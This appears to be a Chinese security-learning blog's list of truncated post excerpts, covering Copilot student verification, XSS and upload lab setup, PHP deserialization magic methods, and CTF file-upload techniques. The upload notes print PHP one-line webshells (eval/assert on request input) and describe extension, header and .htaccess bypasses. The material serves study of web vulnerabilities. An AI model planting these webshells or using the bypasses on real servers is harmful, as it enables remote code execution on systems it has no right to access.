本文档适用于在校情况,寒暑假或其他原因不在校情况请点击参考文章!!!
参考文章:github copilot学生认证教程,免费使用两年Copilot Pro!!(避免踩坑版)
由于开发了一个物记导致两天用完了所有额度,所以不得不进行学生认证。
提交完之后在食堂吃中午饭回来就成功了(周六)。
当然并没有像参考文章那样进行手写,如果出现了文章中相似的问题也可以尝试一下他的方法。
注意事项:
关闭梯子
关闭梯子
关闭梯子
准备事项
修改个人信息
绑定学校邮箱
点击settings/profile进入设置-个人介绍页面
如图修改个人信息和绑定学校邮箱,主包自己搞只做了这两步
邮箱绑定完成之后显示如下
双因素身份认证
打开GitHub——点击头像——Settings——Password and authentication,添加双重身份认证
解决方法:
① 选取 Authenticator 认证器应用认证方式:直接在 应用商店里搜索下载 Authenticator 应用,之后打开扫描 GitHub 上的 QR码 进行账户绑定输入对应的密钥即可;
如下图表示验证成功 ...
[ 靶场环境篇 ] XSS-labs 靶场环境搭建(特别详细)_xss靶场搭建-CSDN博客
参考这篇文章很快就可以完成
打不开github可以用watt
唯一一个问题可能是,解压之后是两个嵌套文件夹,把里面的文件移到xss-labs就可以了。
这样可以直接http://xss:81/xss-labs/访问
什么是魔术方法一个预定义好的,在特定情况下自动触发的行为方法
魔术方法的作用反序列化漏洞的成因:反序列化过程中,unserialize()接收的值(字符串)可控;通过修改这个值(字符串),得到所需要的代码;通过调用方法,触发代码执行。
魔术方法在特定条件下自动调用相关方法,最终导致触发代码
相关机制
触发时机(动作不同,触发的魔术方法也不同)
功能
参数(一些特殊魔术方法会传参)
返回值
魔术方法
__construct()触发时机:构造函数,在实例化一个对象的时候,首先会去自动执行的一个方法;
1234567891011121314<?phphighlight_file(__FILE__);class User { public $username; public function __construct($username) { $this->username = $username; echo "触发了构造函数1次" ; }}$test = new User(& ...
面向对象PHP 的面向对象是一种编程范式,通过将数据和操作数据的方法封装成独立的单元(即类和对象),使代码更模块化、可重用且易于维护。核心概念包括:
封装(Encapsulation):隐藏内部实现细节,暴露必要接口。
继承(Inheritance):子类可以继承父类的属性和方法。
多态(Polymorphism):同一方法在不同对象中有不同实现。
类类的结构结构:定义类名、定义成员变量(属性)、定义成员函数(方法)
1234class class_Name{ //成员变量声明 //成员函数声明}
类的内容创建一个类
12345678910<?phpclass hero{ #定义类(类名) var $name; #//声明成员变量 var $sex; #var为一种修饰符 function FLY($var1){ #声明成员函数 echo $this->name; #使用预定义$this调用成员变量 echo $var1; # 成员函数传参$var1可直接调用 }}? ...
文章:
文件上传漏洞 (上传知识点、题型总结大全-upload靶场全解)_upload靶场题型-CSDN博客
核心目的
上传Webshell(如一句话木马)
典型场景:上传一个PHP文件(如<?php @eval($_POST['cmd']);?>),利用蚁剑、菜刀等工具连接,从而执行任意命令、读取文件或提权。
适用条件:服务器需能解析该文件(如PHP环境),且上传后的文件路径已知、权限可执行。
其他攻击形式
服务端解析漏洞:例如利用.jpg文件被解析为PHP(Apache解析漏洞),即使不直接上传PHP文件也可执行代码。
覆盖关键文件:比如上传恶意.htaccess覆盖配置,或替换系统文件破坏服务。
钓鱼攻击:上传伪造的HTML/脚本文件,诱导用户触发XSS或窃取信息。
拒绝服务(DoS):上传超大文件消耗服务器资源。
CTF中的常见考法
绕过前端验证
直接篡改HTTP请求,修改Content-Type(如image/jpeg)或文件后缀名(如.php5、.phtml)。
绕过服务端检查
文件头欺骗:在PHP文件开头加入图片的魔术 ...
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869##PHP:<?php @eval($_POST['a']);?> (常用)<?php phpinfo();?><?php @eval($_POST[cmd]);?><?php @eval($_REQUEST[cmd]);?><?php assert($_REQUEST[cmd]); ?><?php //?cmd=phpinfo() @preg_replace("/abc/e",$_REQUEST['cmd'],"abcd"); ?><?php //?cmd=phpinfo();$func =create_function('',$_REQUEST[ ...
一句话木马
<?php @eval($_POST['a']);?> (常用)
如何判断校验是前端还是后端方法:上传时启用bp抓包,点击上传php文件之后,如果页面弹出提示“禁止php文件”,而bp没有抓到数据包,那么说明校验是在前端,可以通过bp抓包修改后缀来绕过
CTF中的常见考法
绕过前端验证
直接篡改HTTP请求,修改Content-Type(如image/jpeg)或文件后缀名(如.php5、.phtml)。
绕过服务端检查
文件头欺骗:在PHP文件开头加入图片的魔术字(如GIF89a)绕过内容检测。
双写后缀:如shell.php.jpg → 部分过滤逻辑可能删去最后一个后缀,保留.php。
大小写绕过:尝试.PhP或.pHp绕过黑名单。
配合其他漏洞
文件包含漏洞:上传一个非可执行文件(如图片马),通过Local File Inclusion(LFI)触发执行。
.htaccess利用:上传自定义的.htaccess文件,强制将特定后缀(如.txt)解析为PHP。
非Webshell解法
直接泄露Flag:题目可能要求上传文件后,通过 ...
安装教程:PHP命令执行
该文章为本人从0搭建靶场的过程(本文章只做资源整合,具体每一步我觉得视频和文章更详细,因此不会具体描述)(本人刚开始接触kali-linux,文章内容不免有些问题,敬请指正)。
安装kali-linux如果已经安装了kali-linux可以跳过这个部分。
由于之前本人用虚拟机安装kali-linux碰到的问题过于多了最后成功了但没完全成功,因此采用了WSL2来搭建kali-linux。
[超详细的WSL教程:Windows上的Linux子系统(https://www.bilibili.com/video/BV1tW42197za/?spm_id_from=333.337.search-card.all.click&vd_source=3d9e793b3ade52daa18c644e09cfb1b5)
按照教程下载过程中如果碰到卡顿可以选择用梯子。
安装靶场安装docker如果已经安装了docker也可以跳过这个部分
检查docker是否已经安装docker version(安装好kali-linux之后可以直接运行这个检查一下,kali-linux可能 ...















